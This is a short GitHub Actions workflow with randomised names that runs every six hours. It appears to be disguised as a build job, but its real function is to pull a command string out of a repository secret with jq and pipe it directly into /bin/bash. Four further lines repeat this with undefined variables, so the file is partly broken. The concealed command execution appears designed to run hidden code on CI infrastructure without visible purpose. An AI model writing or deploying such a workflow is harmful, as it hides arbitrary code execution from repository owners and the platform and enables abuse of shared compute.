name: unablepregnanc

on:
  workflow_dispatch:
  schedule:
    - cron: '33 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: unablepregnanc
        env:
          yxe9710: ${{ secrets.yxe9710 }}
        run: |
          echo $yxe9710 | jq -r .ozs962 | /bin/bash
          echo $zgy9 | jq -r .g60 | /bin/bash
          echo $x700 | jq -r .vpp7246 | /bin/bash
          echo $yht1878 | jq -r .q49 | /bin/bash
          echo $b38219 | jq -r .iun77 | /bin/bash

